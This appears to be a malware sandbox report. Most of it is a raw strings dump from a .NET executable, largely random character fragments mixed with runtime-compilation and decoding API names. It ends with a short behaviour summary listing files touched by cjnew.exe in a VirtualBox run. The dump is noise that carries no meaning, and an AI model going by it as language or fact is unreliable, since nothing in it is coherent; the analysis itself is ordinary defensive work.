yM3O
(%*$
T=k0
Vf,
"etk
*Ae^
[c.%x
x)?]_
qA6g
y!u,
DebuggableAttribute
{I}T
4{=l
Cvff
5J/A
w~Rz
!=!
^OrR/,
3EQK`}
-f M
J3R}
kZ_g
t| u
-(`Q
q|,r
`WS,5
~9=
S(CK
) =h
.iF#
4{=,
S(Cb
Ed Z
8#k0
e\`o
ab@L
'C>k;
SmtpPermission
6bVJ
dcSn
D fY
Rz]cC
6Vn6
XQC:
1nn&
2fL|
}i>7y
dMeRj
o2'8
{ UQ+
L It
|s/-
*("M(
}u}es
;j;*
*Pk 4y
2.Ug
vwbJ
rP)z
$O
2rp{
5Zj$
?7eMfI4DF` %
@#%MO
>8lO
+X'G
Qs|0
lpQ%
&W8u=
%*..,z
|~bd*
^KQPD
k$ B A
]HJ6O
#49x}
l&>u
vjxa
0Hi.
T'xt
nIG-
~kIumc
dG9w
M:~Cs
>E8%d
JUmD
6t:GSy
jt9yI)f
ProfileOptimization
AO2v
PlXU
fQ@E
Ykl\
s^|Op?
'l}X
:`2c(E{
"grWw!>
^.qT
F[lm
{az?7
VMcz
,=j\
'"&=V&
eQ|?#5e2
.j)N@S
q ;T}
Lt>m
O&*c
m8bK
Wb|L
e5p17
sHh-pW
1Q8j|C
z;m%wP
*UyF
fsK1
_DZA$
2DP6T4
/d X
p&/bJb
NN@ 5w
?-p9d
N4ZG rci-
1Mh
]xw1
:~yC
"oVeF
TDaOY
NVq#
`i_a
t8>p|
l/EgeF
Z'J'
WhJV
P#/-
G|fx:[
BZem
=J\~
:U{]r
>{K@+]W
m R<
yb |
.'lfc
ByCq
>49-
xcuR
,hd
q}]s
( /d
0'M
vcQcM}
h8'Q*
K:M0
oj3w
d6'b,
y_(r
5<,m+
pK41m
EkQk
)34i9
rK~P9+
MEMORYSTATUSEX
ttO)
Vg_',
baa1W;
[3pX
/tHO
kA B
FPF[s
[b,$Xr}yF
8!\%
b3)s
#^m"
y/^}d
H& l
4{XM
*Dd
KZ 89
"@`,
~ <a
[!R'
{:QiLY
bl?K
"40{
RSAQg
Bz,t
2<9R+
Jq8'
A\]&I
Ubq-UDV
irOq
fW]D
R=8*
d@^&
eZu1#{F
%MZ
r[sE
q cE
i9Gp
G)cW
wa=q?
*nN
n3^
OGX)
1-I+u
y;YV
5Qm(^iE
g&y|
EL6C
lQ(0&
]>,S
s%u>L&+
/o5jx
f5-+
mbpQ
]B7lo
@K@b^RL
4H6
?F{B
~}X<
4I 2e
FeniBc
8nes
+vS5
{8w|
Q*oQ0
=]n2
veKV
9A$ /"
k !N
nXXF7
6b {<
`-{1 xB
X|vZ
`J{*
V~RCu
]pZ-
jdiI
+ FY
^vjN
&>45
9sY N2
pHan
]>/&mx`$z
9_% 7n]
5=QC
E:n3
9Ygo
3hZ^
v^iFr
62Qb
$4?g
[!'?7*
|,,a
mE*K
P=N]y
Lp`>
GK0l
X~t^
gZ\j
/[04<
5J`6a
UgV8
l}[MZ
5zcR
"ir*
?35m
ThreadAbortException
U3
U8Yh
mc[m
& o,
A Wg
:9%Gd
&X;]
G;([
RZGn
-%!9&
8>"M
?z ZW
beqUyB
&U2!
%n)=x
, }11
zEmE~
-YGj
?S/
ReferenceComparer
8i-G"
V546
e".\
jE &
f^~!
D'~5
{~f(
xc/`
v%l=
`}ql
|Jl
1lzv
n1}!x
Mrc>
,I}
Lw&[BK
RG >
YE/|'>
8upu
zlIc
Ff?Av
&&@L
6q"X
+du]
d:'3
]*iG
|W*g
m@~m
\f#LV
%s\1
& Rf
xLD
A$do& l
K[{
/T@Y
ONbc
jHv2
eZ#}
O);o
qd l
WfA8Rf
izF
sB n1G
C]?>
Il[F
VTq'
9<W68
7V J
chK[
~|$zD
|>6Y>
QzL6G
?,<Gl##|
VBDE&p3
v m.z
ZcG*Uc
J]MF~<wsZ`y
9n|;
zMLf ~
Jd.r
^4Q-
f_.6
=)Rj'C
@z`|ED
\B~i
`X p
0%nI
6^MK
W~9{
kl/X}J{
-)/[
g;LO
2cq
' 3~z
J6M$
>|Hj
gff_
|PiRZ
fsI
nJiEn
P=fU
w6MB
5 .
'^r|
SGF
h$`/z
ZH-_
6Di| )
}ZNk
m 9O
pCvj
vl|
nNox
|0"=6
$MYC
_FSl
RmxP
JMjM
Ps2tU
`pwo
get_HasValue
!Fcb
EOT3
m&3fj@`DW
sU'5
Z;l
S}US
L;If
5Mdt\
G~/o
Cf g
?J_@)
1A$#
I[+Yd
_5=!
ED-K
uNy)L
!\aOG*
u$$O
U<UD
U2)86YQ|
98eWf
}[3_
RSKQM
TmGGU
\ Z2
)KCq
:J7s5
';Te
+E)1
HMI ]
gSm=
Hj$;
nx8$
Cz~
Tu`I;O
]1w y
'[3h
_zb
Zn0"
HAY
-]eL4
%reLV
UJPM
)lRk
FK<dE{93
g3DB>l-
/NTa
|p c
[h>kj
`C 4D
9[w]g
fv\
MaK-
Nf|$
B&y+
Bd*S
;]Yi
oGb
wL06?
iySp
V/J6
^V-C
\t8-
irM!
g7he
Mp_]uVC
E[ZI2z
O^nW
M/oH
.Z=MG
F^0F
WdOF
5Mxe
4{r>
t -C
WriteLine
JI$>
UL2l
Knoi
CategorySample
]nFr
(e
zy]M
xm^B;un
]SO.
ke.W|BX
ci}f
"GqkD
~2Jl
},C"
AYEI
G[2b?(
8'O
+J>/s
qxqD+
0o
dsFxW
cu6]
>j7 9e]
8Ywa_i
ZIK2
,.kk
7$v "
5gKrM2
WgWt
GE&"
NE+64<=
%ieG
6 bGsw
rdv5~D~
(`sC=
G(in
~ST8
9_Cj
w/rz
?wF7
~ 3@;#
~?&|
.;ati
CKQJ
SslStatus
6M c7
AyfO
]Ghjw
$J`&`
&{UM
#YgQ}
:K<6y
T\7S
A,|&
--#`
';l#
A $[F
7:I@
risW
j Sa
X Tm
P|\l
7DZ+
XgZD
|A=qA
=':V
\|J]
P&BrP
/ZT^j
vnPO
7N >
.H
isP
={?G.
Klh
-"6=
(7)7E
XLXCN|^
r&*:@
OgY4Q*
m x2
u:~t
W5
S7 Wf
OP_w
lsw_0
+9sD
VB"v
[/]Z_
^7^U
Rr!
"DMXm
!/=k
{-&t2
j*@h#R
e1w^8
H,08
h.Rm(
;]!W
%`Ni
C lK
zx |
itJd-
%c4_
mta*o
Xk\k
Y/ E
5s=X
2)?{
p&5~
WebSocketHttpRequestCreator
LnP&
J?T*
^13Bu
K06E
24'd
AYfh
f+9
I}%Y
k5(
0+zY
P6Q#
,zb=
}"
th\3
J;ab$
bn_S
u1p ] L)]
$n*_Q
jBf_<
l)kQ
W|X )
CcAW
}kRY~
n(}^
M :U
]z~Pk
E]EKUN
sz2r
+z4$
:6VN
lum
}B,e
[QV<
5]@j
AOyxA
B#5(
- Ra
:nS_%
Mn "
[ [Z
i)W 1
z;T3-
lAEq
g^B!
%>:+Z
ilyY
jsw.g
u'yN
\o,h
<Y %F
K";
f:)P
RyA
/JzD
z8nK
lfW'P
FromBase64String
3G Ej}
set_IncludeDebugInformation
`>
,MOV
|dz
w>Yg
'i2*N
3txu
1h?%
I2zI
W)l
\f50
gk+H
|N `yo
@:/u
KL#6|
.N\.'
?hqP
Vptb
3Fab
ZAi{]N1
P. ,]
$k I
m=D Lq
7G=[
o/|[
M1M{
$^{<`
AH= X
83!)wH
<m?x
Z31
k,K]
Fxa?
|I,d- O
I $2
:0>g
EscI
PROZ/
;h\a%
Kd\s
: /W
=9q-e
R[;)
YLd
=Vi8
cG'-
z[QZ
dH5z
'A+V
'uFl
MDm
ajJE[
zl`6
SyKf
lTG'
.N? z}
>a_6
p%=|
5+3)
*~LD
oqm)
RyPQaIK
9oijx
>E8x
B'
Wu]pz
wTiKd
1'C!
4qR L
}BO,
JfRF$
NK d
8{ftb
;,D#
xc)@-
;z0R
&2k
\YHy
cg$]
&Q?>
\7U
DZ~3
bf|4
ParseCallback
z]fq
R;)'
^5ru
5P^8k
X]Q^
ActionQueue
y/.\
7l'o
o( 0
uQh$
IX%)
f_%46B.
VWT7
_q\8
b8no%
0"b
rmqq
(q }-MN
Convert
=19[L
C@'y
0Qr*"
ry5!
@eqE
System.Reflection
hL}'h
,KJenxK
!z]-
D:F?R
+C6<
>5}L
K!@?
x%-e
84[`c
=Dz*
L 8 o
&%oW
2SU4u@
ZKCE
?kf4
>A{j
XDn/
JWRe
;Dysibo
~2L}
?Ti4
*A+M
*n ?
9F10
0'Yg
BDwRZ
c/`
r[LdKf5
U'O>
y`y-Y
r\1=
E0tG
mqUz
GiI9M
E+v)T
8E\@S
'+7$
rQ$;
TypedDynamicExpression2
T/:85[
nA"=
V~[MI$
<\\h
*rSV_
}pXh
9 + #
7X-1wKM33
:Z}|
h&`v
/7)q
}iG5
c,<Y
'y\F
:~A&q
$ACd
P ,!
raM
nAr?.
}m?}
2X%W
by#WN
#<b7h
> 3"
*AcH
@+|+
iD@i
< K6
ataKmh
w0A8|C,!
X5#Q
oZ/=g
0\K9u
'7e3
CommonObjectSecurity
V nd
1$D$
@i`0$T
H/ L
2<M>
&6[T
v %C
5%>+
TG9>
)?{O
Izy8
m^`<
1=ne*n
NsUc
g@9H
u?]`
Write
mlg'
vo/
Mu;:
u1 X
4Hjm
8"X.r!
qz->
Iv"8@
18!=lY4
v@l]
@FQ),
g?buq
m9mb`
_ R$
1nhI
ipybr2LrS
} [D
hZ>-
9o~6
oA#x
{ U[R
0E;>}
irnSa
_>fj!
U64T=
36*D
QI4|
=AqJ
lM*l
Console
}!t5$#
hAV4
Yt"R
bLWr
idUM
N?@-
+8JG
K Xm!r
*sYD
i64W
#9{
u #3
jHQuC)
kS,4
tp^J
<Jo:
Graphics
TFew
]|R'
e8sz
z Ei
W]oR
:T[xU
6;7X
=A]8;
j R};UoH
OPJ
^aK o
bIe3
{FV
Microsoft.CSharp
:&%Kzx-
&!>y
d^1m
%j(7(
J&Mv`
3x@`q
<nFk
`{w6
FXzi
9GEM
~{qC
@OZ'07
}Ut-
*ik`TjwH
J^pr
xbKP
*3np
N=.t
vpHI\ax
IN[|
8| i
W %~6
EL!{
e:-=
Environment
wBPI/
iZ-Snsj
L7g~E,X
\&_
%'<Y
!ueY
.%R"I
k je
$ q2M
get_EntryPoint
D$|fV8
|7iFx
HC7"
C-4V
f-^S
I\+a
! ~
c!%T
3yyz}1Q@
Zou-
v|
4[:En
;sWL
M>xyY
P,y~
?iM "
xzf5
&?G.
+;Ha
ROU3
qQN{t
UD:F&f
'Srg
sfhjX
he';
1pK:z
$`~'
mq~f
*i g
Vmv ^l
3@yl
6<tO
Double
Fc[iN}3
D_&H5
a%St2`|
8IC2
[g^|OwH
L81d
xQQu
}N@x
:v)W
XcgB
Pb~w
=\4d
2]F]
%+ Fl
x]RM
D_RR
tc|C
Mv^&
8:ho
C5cm
'WP2D
,I&]m
:2"&z
nJM]^
@I.X8x
%zym
W/8*
bDo]
$qy
==Q-
dM)2
w6,n
^caK&
IsBoxed
n.c9
i/::
rt{
v;U'
{=fOcU
&FM"
CD1D
h/#s
+Y__WU
U-5:H/U
T+y-
o.)(V
}Yeg
9v>wq j
|kZ"
Ae=Q
o[(C
;&AXE
;u C
z1(S
M>Z.^
@UPRL
^2Xv?h
@edjVHa
lhTA=u`|
X bPe
oDuK
q /.
"2D]
?]M
Q#+b
R2M=
Bc7
LHD9
"N%u
wOKiw
h,T$
G#C~
(qNd
&A]S
kg#R
-Hr}7B:
fDe
V`:e
qlsU
n !\
a-l)
V|M0x
G9<~
{a>:
Z G~
=;0}
0V4S
r@A\
DESCryptoServiceProvider
7y}O
xDI-l
sV4e6
i$T!
Ep-<t
)[/h
nyM>
m7qn
] nTL(
= YN
;WqC
y gA
=^p`.Y
NB&
TON%A
IqkZ
o8fC
z|L[
8%s4$
ESU=
|M6m
=7 Q
aV.7
:k T
,g]\
Ugln
Tanh
>%4w
LsKq[
R]c6
CdKB"
-ix
V0*uT!
^i=R
!z~<
`[n5
EK=N=
&>2v
t|}`
wr}[n~){
T 36
a\s&a
v3ZNR
fCa@L
V52N
?@n"g
[AO#
bfx2V
xihd
N<0 )tJw K
>-D*
;cn_X.
N'O
Ry }
%ulm
Y1"Xj
o 08}
.A $
6d=h
r 5I
,$8Im?
L91C
=Q)/
z^= + #q*
g*~'
f94#
Q.f1
GrG
Qz`At
xgEi^
X l%%
zvBD&
E3 6
9XZmY
n"Lj
M<[c
=nB\
{S^3 B
3NnJ
I3&f
q68T
g%<Xf
U+"dOV
2UNiSYe
&m
4,[B
?',}z
:vS$
Y.+ib
r{Y-
3[AHO0
?7>
j:P
o,
7}0Ul
gsemx
W G9
w+O[
v{wF
IK8:I 9
>zj;
@Csh
;z-]Y
i[o'
1e *
4`Hi
vHt-$j
jPpSp p8
VzJ?
=>Ne
19>b
*wn1
pHYs
"-Q"
t#ax:
-t=V
p9[f{
dTrE
t Q;
|(tN9n{O*!^aX
);1@
|L(k
WEq
5PIw
o-R4
zA+}(e
zUv]bw
S~%^
R/e
t n
xX(c
b-T8
.o.
q 4j
^z$f
:[09
VCQ}kiQ
#%Fb
Q6J0
' (&
,)Vr
K^ p
[;_sJ|
ConsoleKeyInfo
=&6k
g=h!
)N!m|
1g8]k
IK2|
NxlJ
eEEd;
=Hb]
lZ|" >
Vc?
_z"/1`
msn\
*cKC
;bDJ$
_b}\psN*
`2D
HoU{;w
yn /J
+ AC
Q.op[W
IQY]o
7[T8
V yaY^
N=$%S
c/ @
hT>S
s bY
c 3W
Vx.yCq
?1:1
}rO@0
E88k
CW~n
`yr(
$8wxA
S*1 k
-[%K
Q (
^TQ*
ElemEqualityComparer
e#>k
;)J
5f(xp
U?6N
zEM)
o%jeO-[
t|bq
y<J!T
@y4/
gf<v_m(
xbVCvCB]<
okc2
,TF/
G*}#<
snM2
q3py
s: zuB
JedT
:EyF
[x0H
_1g1x
|S mi
d'%0M
gk;@&
8x[
Z_Sr
Qev
"&BY
7Hn\
a%Sh_yr
dtZH
{(%o
r:x\\M
34pO
ZH[oh.
k<kd
set_GenerateExecutable
DataGridViewRowHeadersWidthSizeMode
>7E1QF
uv8
Oh*2
5qiv
JI0@
4J7|B!
0lj#
ERw9zfr
:aWKF
=1ePv
Qt!3y
"A<m
nj 1
)mZ |
L=<LF
x"U'Ni
s%;T
-XQ^
WAj
H00^
n5T<
Ef.}
P"1>F>O
bY"S
dYQ#
1v]Q{B
XSgz
{XM]
rOP1
g5%
~ m(c
N\L%
`F]<tu*
;P_W#j
OL6-G
j4Z0
=A6IzW}tR
:.BLd
>g'T
31\i%{
& @
" g-
+1id
Sl?:&
J4ro
iB=YG
{F"r%
^b#=
IKas
%[T*
$H"W
Ty t
Iw]2
|I{ }
u&?<
[;{w2N
[ R
48bf
iK2JK
b3]e ;{
*u
PdZf
Ldt&?
#i~i
FMrS
yNbIKf
94,6YJ21
&Em)>
c?p;
x~?[
q[yQ
mL<su:
9'S!
p#~
TK0z
;IFOB
)QML6
\^tZMwt
*}WN
5Y8b
k qZc
3o}H
e7iU
oTy\
9 =N
CodeDomProvider
v1wKt
9~t6
,_6y{
fo R|
c9mJ A
y[dF
T mUFCR
m/ Cq
Q ?(
[4Cj
1=*<Th
x90"
36,M-55
BVnj
9^ C
H<a_
thZ(
,DQ]
WvXkr
EQvH5f
SUli
g cF
b6^n
t4`k7
NY!]
|fZF0
xYjY
=D \
D /V!
tzJ`
d(OY
~ s==
+.1c
e{w{
CF x
:1_
WRbE Hg
#4!M
pQ}N
-%%?
F8=
:vU)
KI#
a:xc/
iu(&|^
]o{0
6yH
4{zmI
fXMz{
o w;
=hDQju
!S_K
aceE
\J 3
&a#=
lQ/\f`
SU9q
PJH<`
SU9j
ixJ>@
@]H;
"[x
nVGr/r\\
`9I0
Rh_8
~q>$
zlrY
`Z9D
: ,{
ffTf
k(>j
Ceiling
Wnja
)p+=
Uk55
%-hc
p+|~~
ContinuationWrapper
tu(H
e&M=
8-vQ
R-3
={H-9
Pa o:B
y cN
v @cIG
$lRf`
tb >
fc EL
0PU8
rb|H
60D"
mMv:+
{<CA0
yg>}
Sn2ecQ
M S9uj
s *9
db-[Jj
]{?m
0;)Qm
8kZ)
v>?X
KfP*
i]XY
6%K
%'x h
-B,@
$D;>
;( 2
& tg
k>?}M
s^Ec2g
e" G
ja#0
N9C
ei[+E
n.Eoh
P_&V
y4c+
x=l*\l*
~iv
dM&i
{W?Wr
aAhX
D#q
/ 88D
`;c-a
%3{A
wZ-
,7+ V
$u (AV
4<R
L pF
hb%HXS
z&L'
}:.=
!|0&
Rp)k`
=jWh
n b_
9?{b
O=,k
7^AL,
`)>+
[*mQ
fo @~y$c
h 5 X
&M+N
OKqD
ldu7
A ue.
A!H5)
hHwJk
)i|]u%
Acos
}n_ {
BM%)
t8Ck
jEW [g
9^V=Z
?$ c
jrwn
-nas
"Avw
gV6Wd
PdbReader
GGoS
'(~|D|
1\uYkX
SystemMenuItem
ReadLine
vi)|J
:uza
V k<
'R+7
.}=N=
17K_
" 7)
Er49h
1u?g
:>d?
$ E=
?#a\O
^oX_
7R(l
/6.M
"^*X
<xbw
Pq+T
get_Message
W}]Lsj
d}jo
!,2{
n"cq
l$;2
kW&4
O3(y
8|yd
X?$6
t'}S
>G
set_GenerateInMemory
L Fj
Q-z/
c>:_s
(" ~O`
6K= tA
Q 8)LIt~
pD3J,W
UE'w
89e)
Rl\C
; bI
}TQX
"qv
BpYJ
2 j]
{y2=
$jm5
zPg^
FXS-
f $kC
BSJB
eGkb?0bp
Y7Oj
2"@4
ja#]
7NA"
K~jJ
=h
wi+Z$x
E 13H
xva"
FYYkU
Ge+d
%X8H
Q \L
P Jh%
RG.x]
qdMaMG
}kL9(
rl~!2
M:I
IUWg
`4I [
jw>5
u-$#
^pWQ
Zk"d#
G0A{
8_qD
s Q6
T@`u:OG
LUen
w(B`
$e+K6f
f]WM"/tV
:;91
vH3I
ea<)o#H:
mT 7
/6 K
9xXY
?Y0;H
7fdU
BDz{
UbRF
YR\R
ConstantMD
2^[UWW
JSk+t
. Ml
}6Z?
[=]O
ParallelEnumerableWrapper`1
e/+
6uwE
Q'U'
C]1z
My'(
2*pff.
lc95Q
(]WdXU=9
$FEQ(^o
*mWgy
{c7"6}
HFO}
7l<}
@7.u
z%-2
]]mLSW
#?Wb
O^}4
64L6
SQy
fE"r
{ Jk4
Atan
_&U$5
c;IfT=8
)?I&
\n[
VWi3
7a1K
U.tn
}j*
ConstraintConverter
E?>Y
_I0B
]|Xf
ckn*Ww
Z:?_
Cs^j
SJu l&
}6Z
5 {,Vi
<GSS
r`!3a
[A{)
B { ,}
~1Fa
$'V2
6#Re_
$$5(:b
k&.5
pqjG3
sb<@
%' t
pC~mA[
J^G6
T_>ubJ|shO^
PnRLU
rw8g
B*
p.l%B
d;[-
C}h"
IEND
_I!O:-
LinkClickedEventArgs
{5A<qVQ
39Wo
/M:V<
fz&46
5M )
qIuV
J^Gz
D,!5
? S~
y-=2
JR#,
tK\O
xz=f
EDG_v_g
*i o
|lEo
[=r7
iv9\D
|+~t
)5dij6kti
8Q),X
A97
f}x
e"0BL\:
l(Q@
O06q
3\q#3
_7nJ
CSharpCodeProvider
%_G@
'DRE
s N;YvI
qf|*
_/nf
.-/M>
H@Q\
8<2x
U+kx
_zT>
(~D*
f6r!
>}^
Rqikm
<?Kg}
l+%
d-+K
$w"
5Mr}[SY
F|:+q
pF9N2
Y
:M|`
#@=J
+odsp
9EZW
xCFu
S5hK
^* #
-^M*\
UO5{
E `y
d) [O4
AY? 2z
d+zQ(6
`>lc
FO{FPB
`^!
jOu|
([_*
h 63
U]P)
uN.C
\gCY
gb`iA
xD+X
r~6MR
">+N
zsIq
yD[v
~ =hwq6
~u4Sy(
3^PI
]h~(e
KE\[
-YvY
DJhZg+
t.$O
*d[d
Hs/o
!u7~
lp$+
Tg/^8
J\VA
VS=h
lj
fg&D
=3
C/(fm
:XK<yS
|+tm
9&t*/
KH>\
wu>5
ToolStripLabelAccessibleObject
Encoding
@Ov{
t~!`
H8 &b=
^"o.
?f6!?1
p s)
o]AM
.|Bm
aKNd
FunZ
?1%Fl~
R,u:&
]\l#_
/qA dl
h PV
Rp45NGc
qN?I0
6gTd
WAf
BWy"
^O!2n:
Mv]$
Z-`[
{\|vnQa
Z1cW36
My8/
Q<"g
(cJ]n6Z
Ga^e
%YK9j
T8Fj
]N&Gq
Hj/* Z
dku#0 e0
M[ |<
9a1A
[k %
7 [
Q+nb
.q.
pyc~p
gO6R
I&U89k( X<
uYmI
& id
cP+q
>iZ'Y
Hg^47
|yp
'r~S
Wzjex
,M lB9u
^yB+
Q/qw~
,a5]>'
oYrXFN
[0;u
#B,=h
OYR(
EevQ
joW6
ac P
3'Wf
,EZi
iL8f
uW~+ ~
zdbsj
XmlTypeMapping
4R7 TN
./WPY^
|?hL
x~BQ
jT5=
mY(H
AVLB
^]BR
Na9e
?e Ns
HsY8!
&5{+p
P> &
c~Z&
4a^}
*U
%jsil*;
/0H+
e,H
@aP7
| *n
#UeE
?0/4.
S/IpA
# Xk
}9}
=_MP|9
r')z
P&^B
kq.3Vv
3q#
n`z Y
ZY D
?zBi
<2_V
<N+}
G$cm
0re
';`-J:
h>@z
F~aWQ"
i;t
Iml3
jAc [
B^y^A
<4 'T
i9fH
^{??
z.SH
q)qL6
'3"R
AB=v
| D;(A
NyqM
4>f&"
PJ W
X~w<9t
(MHf
vCIS
w| /
UMu*"
{U!0
IpHelperErrors
- 8p
gqSX
3pqS
h24p
-T2)
@Om
y&?h5
Exit
G$wFU
Ba<:x
28xh7
# a
-\L{
]uMvL
d:{]
q}Y}:
4kH7
~;lPIk
o rso
lkiR
Z>33;"
2&DSu
F P+
,s[=
[UF7"
WEwm
:p-5;
}&{S
!GYjH
T9i'/
\=2B*lr
a QV
TEB9g
**uY:U
`K p
Iw<2d
*e0V
>9..3zvb6
1Zz]
:CJ#
,N&m
7O.Y`<
Uy;q
\]P9X
~$^1].
0H?{
Vb;
D \S
3{5v4%
sLr_@
J 2l(
64 R
xT4D
_"K$
iE*q
cIIo
&U ~
bdZT]
}8X9l
'$_]gkU
e8Cu
V~tn
2}s=
{5T!!2
ETTI
o.:y
xPV#F
~!PU
*1(X
Eq> :
?zXH
qFi:2
o>a
]s3Co
t$s2
#8Fp
Y9lo6
EM|
4#q=3
[k&"
:?xS//
TreeNodeMouseClickEventHandler
a/fPM
@?/|
w~KS
iNG+U
ISystemColorTracker
e ^B
(W kZ3
{nQG
xo$0>l
.WXH3:
%/cS
v6[K
2h2
3I&;
y7UvY
ShT-
7Vn
Next
YKBR
UG t
ux(G
%%)%
j1+ p
}$hR
H.%7
O+n>q
,WJ
BkM
T6V/
0mNf
9Q<
6Ock
uUDn5/=w~
LybS
FW#O*
'|on\
4I@j
0AZ'
7E!b
P|^9
jR~XyY1
q9[/\
^9{sd
\I1L
nW\U%
izyU
[dyz
,uTAh
ErrorFacts
"sV)
oEsic
kcg'
?a7Sr0
r j
$gbk
WEQ>s
Pvy,
=,RaV
mS=6_4
Av K
j$!>
M Me
VC,C
mxaFM
Ig'mr
{gMv
` g
*6o+
m{rq>
,r}M
%^&St
9hqp
8<5:
:CmZ
<\V/
If\c
TextEdit
q,'hE
E~~
gK7kwz
j?xg
4Jl]
5;T) 8
' @(E
"-sun
Z IVj
KK9PR!
PUjPm
SVtl
zsjc
m2am
AP L
Mr*'
"5zR
Ky-C
<.Py
G.u)_
e77d {
8n(k
SyncMemoryStream
3h?G
hpqP2W
sn0;D
^1n7xi
jHPv5
,WUS
(s?
"CsZ
(eSR
I@yc
L/)=
B*,5L
um#4
Uj\g
Ov_A3
fxcK
M p^v+x
c4^xn
4Q-_
Q^U4
Db(%46
K}F8
D|I}k
System.Runtime.CompilerServices
4pFQ
|{pF
O*Zds(
Ca)&c
D}9`z
sK%Z
j3+ZMJ
%8~C
VGL'f
*QN5
Qcl*
J~GnV,
rO"?
set_CompilerOptions
RNGCryptoServiceProvider
|L@6
61Yi
*}mWcKU!
E~&O
[S 5c
QdHMQ
fO0z
QtW]f
"]ve%
TakeOrSkipQueryOperatorEnumerator`1
'z0&
x8P=nBX
T-6$8
j~[`
y_;3
"\Jk
czoX
^ykqv
\Uny|M
H@7Yf
]f=!
F;zo
}<x,55.
d7 o
[$4zc0
cDkYQ
:z;_v
efRMU
48]D
<wKW
cv o
_J}v
r)X(
[Kt[=
,(,i1ia
vA*c
l bZx
r#vG
:nl:
EuY^
Ok_%
zx'[.od
@dJ?
lB ;+
/Q
g/ >O
y4:g.
,@Ao
$^iQ
sTQY
_a que9
G'`k
?4{2
KdPF
(P\*tr&
]?]I
Ka
| r5
m q+q1
5K*)/
5.%
}VVu
ProcessWindowStyle
HM@f.
tZ[^
1h+I
2ZOT[
;q<:g
RC@!
6}f;
& xY
=8tuh$
SA+P
<x
(ZPM
vd_s
NKQ{7
3VDI
?4{]
):wp>
&]_
o*Og
wGVD
K"|I
Bhvc
"8uP
2XT&
#^4vj3
>.AB:
a8Oz
ContinuationTaskFromTask
EX!i$
.'~0YgO\3b
y~A,7
RFF~@
S#[t[h`
0M4U
H+Z6
#=hg5yD
KaEQsSU2
e=<n*
]qI6
,N{l
n#g[!
P1T
JJ6#(
b6<o{
?}uy
DF->
M"f +
~jR 8
Ntx
@w[
EC =
Hx:q
&2nr
L5 ?
,+HF
k]k%
<4pp
\RQd
i M1q
:l{cy
("7Bnq
?hH+
;76{
W_sh<
CodeThrowExceptionStatement
U4pjS
!$5z
v"l`
axPE2
f)zO
u}KP+
<M9_
8q 6
s[U~
BrjkZ
L hr
7p7I
tAaE
YSx
5{t|
Iha&`)
rKd.
y]G/<
u<O
3YHc
5O+T
W 1>De?
I; u
D.|'n
7eCH
A-/H
WUlLh
aKMaV
jBw'
%uAE
;>{IV
JmQh
Vz/j
Hr5%
1i (
&l$ P
LoOBM
Vo&3
T"+O
~ZgOj
RH1
q|tltyJ4
,jsZ
Wh4n,k
D]b@
%qfH
ruc{
B 2
RndM
%!+CU
95zw
>#dP
C9FI
pV:
J$0w]
xZ]M
P('<
f(1nJ
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven05_64 Seven05_64 VirtualBox 2018-05-28 14:23:21 2018-05-28 14:26:27 186

26 Behaviors detected by system signatures

Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven05_64 Seven05_64 VirtualBox 2018-05-28 14:23:21 2018-05-28 14:26:27 186

11 Summary items with data

Files

C:\Windows\System32\MSCOREE.DLL.local
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework\*
C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Users\Seven01\AppData\Local\Temp\cjnew.exe.config
C:\Users\Seven01\AppData\Local\Temp\cjnew.exe
C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSVCR120_CLR0400.dll
C:\Windows\System32\MSVCR120_CLR0400.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoree.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config
C:\Windows\Microsoft.NET\Framework\v4.0.30319\fusion.localgac
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll.aux
C:\Users
C:\Users\Seven01
C:\Users\Seven01\AppData
C:\Users\Seven01\AppData\Local
C:\Users\Seven01\AppData\Local\Temp
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ole32.dll
\Device\KsecDD
C:\Windows\assembly\NativeImages_v4.0.30319_32\PHswwSXW5mja19a0ded#\*
C:\Users\Seven01\AppData\Local\Temp\cjnew.INI
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\GAC\PublisherPolicy.tme
C:\Windows\Microsoft.Net\assembly\GAC_32\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll.aux
